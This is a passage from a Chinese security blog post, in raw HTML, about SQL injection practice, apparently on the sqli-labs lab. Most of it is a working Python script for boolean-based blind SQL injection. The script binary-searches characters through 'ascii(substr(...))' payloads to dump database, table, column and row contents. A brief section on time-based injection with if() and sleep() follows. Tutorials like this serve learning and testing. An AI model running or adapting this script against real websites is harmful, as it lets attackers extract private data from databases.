print(name)</span><br><span class="line"># 暴表</span><br><span class="line">def <span class="title function_">table</span><span class="params">()</span>:</span><br><span class="line">    name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">1</span>,<span class="number">50</span>)</span>:    </span><br><span class="line">        begin = <span class="number">32</span></span><br><span class="line">        end = <span class="number">128</span></span><br><span class="line">        tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">while</span> begin &lt; end:</span><br><span class="line">            paramsPost = <span class="string">&quot;and/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=&#x27;&#123;0&#125;&#x27;),&#123;1&#125;,1))&gt;&#123;2&#125;-- -&quot;</span> .format(database,i,tmp)</span><br><span class="line">            response = session.get(url+paramsPost)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;You are in...........&#x27;</span> in response.text:</span><br><span class="line">                begin = tmp + <span class="number">1</span></span><br><span class="line">                tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                end = <span class="type">tmp</span></span><br><span class="line">                <span class="variable">tmp</span> <span class="operator">=</span> (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">if</span>(tmp==<span class="number">32</span>):</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        name += chr(tmp)</span><br><span class="line">        print(name) </span><br><span class="line">def <span class="title function_">columns</span><span class="params">()</span>:</span><br><span class="line">    name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">1</span>,<span class="number">50</span>)</span>:    </span><br><span class="line">        begin = <span class="number">32</span></span><br><span class="line">        end = <span class="number">128</span></span><br><span class="line">        tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">while</span> begin &lt; end:</span><br><span class="line">            paramsPost = <span class="string">&quot;and/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=&#x27;&#123;0&#125;&#x27; and table_name=&#x27;&#123;1&#125;&#x27;),&#123;2&#125;,1))&gt;&#123;3&#125;-- -&quot;</span> .format(database,table_name,i,tmp)</span><br><span class="line">            response = session.get(url+paramsPost)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;You are in...........&#x27;</span> in response.text:</span><br><span class="line">                begin = tmp + <span class="number">1</span></span><br><span class="line">                tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                end = <span class="type">tmp</span></span><br><span class="line">                <span class="variable">tmp</span> <span class="operator">=</span> (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">if</span>(tmp==<span class="number">32</span>):</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        name += chr(tmp)</span><br><span class="line">        print(name)</span><br><span class="line">    print(<span class="string">&quot;爆信息&quot;</span>)</span><br><span class="line">    nr(name)</span><br><span class="line"># 获得内容</span><br><span class="line">def <span class="title function_">nr</span><span class="params">(a)</span>:</span><br><span class="line">    name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">1</span>,<span class="number">1000</span>)</span>:    </span><br><span class="line">        begin = <span class="number">32</span></span><br><span class="line">        end = <span class="number">128</span></span><br><span class="line">        tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">while</span> begin &lt; end:</span><br><span class="line">            paramsPost = <span class="string">&quot;and/**/ascii(substr((select group_concat(&#123;0&#125;) from &#123;1&#125;.&#123;2&#125;),&#123;3&#125;,1))&gt;&#123;4&#125;-- -&quot;</span> .format(a,database,table_name,i,tmp)</span><br><span class="line">            response = session.get(url+paramsPost)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;You are in...........&#x27;</span> in response.text:</span><br><span class="line">                begin = tmp + <span class="number">1</span></span><br><span class="line">                tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                end = <span class="type">tmp</span></span><br><span class="line">                <span class="variable">tmp</span> <span class="operator">=</span> (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">if</span>(tmp==<span class="number">32</span>):</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        name += chr(tmp)</span><br><span class="line">        print(name)       </span><br><span class="line">print(<span class="string">&quot;SQL盲注脚本&quot;</span>);</span><br><span class="line">print(<span class="string">&quot;****爆库***&quot;</span>);</span><br><span class="line">db()</span><br><span class="line">database=input(<span class="string">&quot;请输入要选择的数据库&quot;</span>);</span><br><span class="line">print(<span class="string">&quot;****爆表***&quot;</span>);</span><br><span class="line"># print(database)</span><br><span class="line"></span><br><span class="line"># database=<span class="string">&quot;security&quot;</span></span><br><span class="line"># table_name=<span class="string">&quot;users&quot;</span></span><br><span class="line">table() </span><br><span class="line">table_name=input(<span class="string">&quot;请输入要选择的表&quot;</span>)</span><br><span class="line">print(<span class="string">&quot;****爆字段***&quot;</span>);</span><br><span class="line">columns()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># ?id=<span class="number">1</span><span class="string">&#x27;and ascii(substring((select table_name from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27; limit 0,1),1,1))&gt;0--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>
<h3 id="2-时间注入"><a href="#2-时间注入" class="headerlink" title="2 时间注入"></a>2 时间注入</h3><h4 id="2-1-时间注入时机"><a href="#2-1-时间注入时机" class="headerlink" title="2.1 时间注入时机"></a>2.1 时间注入时机</h4><ul>
<li>也面没有任何信息可以可以利用</li>
</ul>
<h4 id="2-2-函数"><a href="#2-2-函数" class="headerlink" title="2.2 函数"></a>2.2 函数</h4><ul>
<li>if(第一个参数，第二个参数，第三个参数)，第一个参数是放sql语句的地方，第二个参数是成功时所执行的语句，第三个参数是失败时执行的参数</li>
<li>sleep( )可以让页面停留几秒</li>
</ul>
<h4 id="2-3-实例"><a href="#2-3-实例" class="headerlink" title="2.3 实例"></a>2.3 实例</h4><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1721736981432-c3b2f7a0-b340-4909-a90e-a159d5e442a2.png#averageHue=%2342332f&clientId=u92e62b7e-bde4-4&from=paste&height=213&id=u9e6fc22d&originHeight=293&originWidth=1574&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=29912&status=done&style=none&taskId=u71a189ec-411b-4f1a-89c1-518de6a24b2&title=&width=1144.7272727272727" alt="image.png"></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
